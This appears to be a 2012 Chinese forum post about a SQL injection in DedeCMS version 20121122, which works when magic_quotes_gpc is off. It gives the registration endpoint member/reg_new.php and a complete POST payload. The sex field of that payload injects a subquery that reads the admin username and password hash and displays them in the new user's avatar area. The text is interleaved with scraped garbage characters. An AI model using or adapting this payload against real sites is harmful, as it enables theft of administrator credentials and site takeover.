dedecms版本 20121122/ u8 w6 r0 B& k: p; k y5 R
: L( s. M8 m. b8 B" B9 ~3 H' i
需要magic_quotes_gpc=Off2 J9 S# i/ J |
/ D% S& W9 E% F3 O: c! R0 g
应该是没有什么大危害的漏洞.
: h6 e3 z! a, S9 J原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
$ Y! E( m7 E4 \$ W2 s
- G6 A/ f+ u. }# X( P6 Q3 N是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.2 E- ?$ O- Z( M8 P; P
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
6 ^4 f9 ?& _0 S/ f( g1 w6 B0 Z' R( O% f% T$ I1 f) X# |
http:///de/member/reg_new.php
4 T: ?) y2 x" R. R9 y
& P1 }7 y1 j. [, h& CPOST
# X8 T% V/ A5 U \, I$ H5 U
F# O) h. q! {. Q: Wdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
; C: V3 x+ o1 {2 F7 m8 l4 W3 @
+ G- X# G5 e! d成功注册后,头像处里面有好玩的信息.
) B$ g) ]; J2 r
- W. Y- z& S" y |
发表于 2012-12-5 10:03:32
收藏
支持
反对